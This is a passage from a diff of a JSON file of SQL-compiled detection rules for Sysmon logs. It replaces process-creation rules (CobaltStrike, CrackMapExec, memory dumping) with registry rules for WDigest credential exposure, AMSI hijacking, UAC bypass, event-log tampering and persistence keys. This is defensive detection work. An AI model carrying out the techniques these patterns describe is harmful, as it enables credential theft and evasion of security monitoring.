persistence method described in the reference section", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DHCP Callout DLL Installation", + "id": "9d3436ef-9476-4c43-acca-90ce06bdf33a", + "status": "test", + "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", + "author": "Dimitrios Slamaris", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.t1542.001" + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutDlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutEnabled' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wpbbin_potential_persistence.yml" + "filename": "registry_set_dhcp_calloutdll.yml" }, { - "title": "Suspicious PowerShell Command Line", - "id": "d7bcd677-645d-4691-a8d4-7a5602b780d1", - "status": "test", - "description": "Detects the PowerShell command lines with special characters", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", + "title": "Potential EventLog File Location Tampering", + "id": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", + "status": "experimental", + "description": "Detects tampering with EventLog service \"file\" key. In order to change the default location of an Evtx file. 
This technique is used to tamper with log collection and alerting", + "author": "D3F7A5105", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1562.002" ], "falsepositives": [ - "Unlikely", - "Amazon SSM Document Worker", - "Windows Defender ATP" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\^.*\\^.*\\^.*\\^.*\\^.*') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*`.*`.*`.*`.*`.*')) AND NOT (ParentImage LIKE 'C:\\\\Program Files\\\\Amazon\\\\SSM\\\\ssm-document-worker.exe' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*' AND (CommandLine LIKE '%new EventSource(\"Microsoft.Windows.Sense.Client.Management\"%' ESCAPE '\\' OR CommandLine LIKE '%public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\EventLog\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\File' ESCAPE '\\') AND NOT 
(Details LIKE '%\\\\System32\\\\Winevt\\\\Logs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_cmdline_special_characters.yml" + "filename": "registry_set_evtx_file_key_tamper.yml" }, { - "title": "Potential Persistence Via Powershell Search Order Hijacking - Task", - "id": "b66474aa-bd92-4333-a16c-298155b120df", - "status": "experimental", - "description": "Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader", - "author": "pH-T (Nextron Systems), Florian Roth (Nextron Systems)", + "title": "Wdigest Enable UseLogonCredential", + "id": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", + "status": "test", + "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k netsvcs%' ESCAPE '\\' AND ParentCommandLine LIKE '%-s Schedule%' ESCAPE '\\' AND (CommandLine LIKE '% -windowstyle hidden' ESCAPE '\\' OR CommandLine LIKE '% -w hidden' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass' ESCAPE '\\' OR CommandLine LIKE '% -noni' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 
'%WDigest\\\\UseLogonCredential' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_schtasks_powershell_persistence.yml" + "filename": "registry_set_wdigest_enable_uselogoncredential.yml" }, { - "title": "Suspicious Kernel Dump Using Dtrace", - "id": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", + "title": "Suspicious New Printer Ports in Registry (CVE-2020-1048)", + "id": "7ec912f2-5175-4868-b811-ec13ad0f8567", "status": "test", - "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", + "author": "EagleEye Team, Florian Roth (Nextron Systems), NVISO", + "tags": [ + "attack.persistence", + "attack.execution", + "attack.defense_evasion", + "attack.t1112" + ], "falsepositives": [ - "Unknown" + "New printer port install on host" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\dtrace.exe' ESCAPE '\\' AND CommandLine LIKE '%lkd(0)%' ESCAPE '\\') OR (CommandLine LIKE '%syscall:::return%' ESCAPE '\\' AND CommandLine LIKE '%lkd(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Ports%' ESCAPE '\\' AND (Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.exe%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.com%' ESCAPE '\\' OR Details LIKE '%C:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dtrace_kernel_dump.yml" + "filename": "registry_set_cve_2020_1048_new_printer_port.yml" }, { - "title": "CobaltStrike Process Patterns", - "id": 
"f35c5d71-b489-4e22-a115-f003df287317", + "title": "UAC Bypass via Event Viewer - Registry Set", + "id": "7c81fec3-1c1d-43b0-996a-46753041b1b6", "status": "experimental", - "description": "Detects process patterns found in Cobalt Strike beacon activity (see reference for more details) and also cases in which a China Chopper like webshell is used to run whoami", + "description": "Detects UAC bypass method using Windows event viewer", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ - "Other programs that cause these patterns (please report)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((CommandLine LIKE '%\\\\cmd.exe /C whoami%' ESCAPE '\\' AND ParentImage LIKE 'C:\\\\Temp%' ESCAPE '\\') OR ((CommandLine LIKE '%cmd.exe /c echo%' ESCAPE '\\' OR CommandLine LIKE '%> \\\\\\\\.\\\\pipe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\whoami.exe%' ESCAPE '\\') AND ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\runonce.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\runonce.exe' ESCAPE '\\')) OR ((CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1%' ESCAPE '\\' AND (ParentCommandLine LIKE '%/C whoami%' ESCAPE '\\' OR ParentCommandLine LIKE '%cmd.exe /C echo%' ESCAPE '\\' OR ParentCommandLine LIKE '% > \\\\\\\\.\\\\pipe%' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Internet Download Manager\\\\IDMMsgHost.exe%' ESCAPE '\\' OR ParentCommandLine LIKE '%chrome-extension://%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\mscfile\\\\shell\\\\open\\\\command' ESCAPE '\\')" ], - 
"filename": "proc_creation_win_hktl_cobaltstrike_process_patterns.yml" + "filename": "registry_set_uac_bypass_eventvwr.yml" }, { - "title": "Pingback Backdoor Activity", - "id": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", - "status": "test", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Potential AMSI COM Server Hijacking", + "id": "160d2780-31f7-4922-8b3a-efce30e63e96", + "status": "experimental", + "description": "Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\updata.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%msdtc%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND CommandLine LIKE '%auto%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\\\InProcServer32\\\\(Default)' ESCAPE '\\') AND NOT (Details LIKE '\\%windir\\%\\\\system32\\\\amsi.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_pingback_backdoor.yml" + "filename": "registry_set_amsi_com_hijack.yml" }, { - "title": "Mshtml DLL RunHTMLApplication Abuse", - "id": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", - "status": 
"experimental", - "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Blackbyte Ransomware Registry", + "id": "83314318-052a-4c90-a1ad-660ece38d276", + "status": "test", + "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\..\\\\%' ESCAPE '\\' AND CommandLine LIKE '%mshtml%' ESCAPE '\\' AND CommandLine LIKE '%RunHTMLApplication%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LocalAccountTokenFilterPolicy' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLinkedConnections' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem\\\\LongPathsEnabled' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" + "filename": "registry_set_blackbyte_ransomware.yml" }, { - "title": "Suspicious Script Execution From Temp Folder", - "id": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", + "title": "Disable Windows Event Logging Via Registry", + "id": "2f78da12-f7c7-430b-8b19-a28f269b77a3", "status": "experimental", - "description": "Detects a suspicious script executions from temporary folder", - 
"author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton", + "description": "Detects tampering with the \"Enabled\" registry key in order to disable windows logging of a windows event channel", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Administrative scripts" + "Rare falsepositives may occur from legitimate administrators disabling specific event log for troubleshooting" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%\\\\Temp%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% >%' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Json%' ESCAPE '\\' OR CommandLine LIKE '%-WindowStyle hidden -Verb runAs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Temp\\\\Amazon\\\\EC2-Windows\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Enabled' ESCAPE '\\' AND Details = 'DWORD 
(0x00000000)') AND NOT ((Image LIKE '%\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-FileInfoMinifilter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-ASN1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Kernel-AppCompat\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Runtime\\\\Error\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-CAPI2/Operational\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Compat-Appraiser%' ESCAPE '\\'))) AND NOT ((Image = '') OR (Image = '')))" ], - "filename": "proc_creation_win_susp_script_exec_from_temp.yml" + "filename": "registry_set_disable_winevt_logging.yml" }, { - "title": "PowerShell Base64 Encoded Reflective Assembly Load", - "id": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", - "status": "test", - "description": "Detects base64 encoded .NET reflective loading of Assembly", - "author": "Christian Burkard (Nextron Systems), pH-T (Nextron Systems)", + "title": "Change Winevt Event Access Permission Via Registry", + "id": "7d9263bd-dc47-4a58-bc92-5474abab390c", + "status": "experimental", + "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", + "author": "frack113", "tags": [ - "attack.execution", - 
"attack.t1059.001", "attack.defense_evasion", - "attack.t1027", - "attack.t1620" + "attack.t1562.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\' OR CommandLine LIKE '%AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC%' ESCAPE '\\' OR CommandLine LIKE '%BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp%' ESCAPE '\\' OR CommandLine LIKE '%AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK%' ESCAPE '\\' OR CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ChannelAccess' ESCAPE '\\' AND (Details LIKE 
'%(A;;0x1;;;SY)%' ESCAPE '\\' OR Details LIKE '%(A;;0x5;;;BA)%' ESCAPE '\\' OR Details LIKE '%(A;;0x1;;;LA)%' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\') OR (Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_base64_reflective_assembly_load.yml" + "filename": "registry_set_change_winevt_channelaccess.yml" }, { - "title": "Execute Pcwrun.EXE To Leverage Follina", - "id": "6004abd0-afa4-4557-ba90-49d172e0a299", + "title": "Potential Persistence Via Excel Add-in - Registry", + "id": "961e33d1-4f86-4fcf-80ab-930a708b2f82", "status": "experimental", - "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.persistence", + "attack.t1137.006" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\pcwrun.exe' ESCAPE '\\' AND CommandLine LIKE '%../%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Excel\\\\Options' ESCAPE '\\' AND Details LIKE '/R %' ESCAPE '\\' AND Details LIKE '%.xll' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_pcwrun_follina.yml" + "filename": "registry_set_persistence_xll.yml" }, { - "title": "HackTool - CrackMapExec Execution", - "id": "42a993dd-bb3e-48c8-b372-4d6684c4106c", - "status": "test", - 
"description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", - "author": "Florian Roth (Nextron Systems)", + "title": "Add Debugger Entry To Hangs Key For Persistence", + "id": "833ef470-fa01-4631-a79b-6f291c9ac498", + "status": "experimental", + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence" + ], "falsepositives": [ - "Unknown" + "This value is not set by default but could be rarly used by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\crackmapexec.exe' ESCAPE '\\' OR CommandLine LIKE '% -M pe\\_inject %' ESCAPE '\\' OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -x %' ESCAPE '\\') OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -H ''NTHASH''%' ESCAPE '\\') OR (CommandLine LIKE '% mssql %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -H %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% --local-auth%' ESCAPE '\\')) OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% 
-p %' ESCAPE '\\' AND CommandLine LIKE '% 10.%' ESCAPE '\\' AND CommandLine LIKE '% 192.168.%' ESCAPE '\\' AND CommandLine LIKE '%/24 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\Hangs\\\\Debugger%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_crackmapexec_execution.yml" + "filename": "registry_set_hangs_debugger_persistence.yml" }, { - "title": "Process Memory Dumped Via RdrLeakDiag.EXE", - "id": "6355a919-2e97-4285-a673-74645566340d", - "status": "experimental", - "description": "Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Environment Variable Has Been Registered", + "id": "966315ef-c5e1-4767-ba25-fce9c8de3660", + "status": "test", + "description": "Detects the creation of user-specific or system-wide environment variables via the registry. 
Which contains suspicious commands and strings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.persistence" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rdrleakdiag.exe' ESCAPE '\\' AND CommandLine LIKE '%/fullmemdmp%' ESCAPE '\\') OR (CommandLine LIKE '%/fullmemdmp%' ESCAPE '\\' AND CommandLine LIKE '% /o %' ESCAPE '\\' AND CommandLine LIKE '% /p %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Environment\\\\%' ESCAPE '\\') AND (Details IN ('powershell', 'pwsh') OR (Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR Details LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR Details LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR Details LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR Details LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\' OR Details LIKE '%SW52b2tlL%' ESCAPE '\\' OR Details LIKE '%ludm9rZS%' ESCAPE '\\' OR Details LIKE '%JbnZva2Ut%' ESCAPE '\\' OR Details LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR Details LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR Details LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\') OR (Details LIKE 'SUVY%' ESCAPE '\\' OR Details LIKE 'SQBFAF%' ESCAPE '\\' OR Details LIKE 'SQBuAH%' ESCAPE '\\' OR Details LIKE 'cwBhA%' ESCAPE '\\' OR Details LIKE 'aWV4%' ESCAPE '\\' OR Details LIKE 'aQBlA%' ESCAPE '\\' OR Details LIKE 'R2V0%' ESCAPE '\\' OR Details LIKE 'dmFy%' ESCAPE '\\' OR Details LIKE 'dgBhA%' ESCAPE '\\' OR Details LIKE 'dXNpbm%' ESCAPE '\\' OR Details LIKE 'H4sIA%' ESCAPE '\\' OR Details LIKE 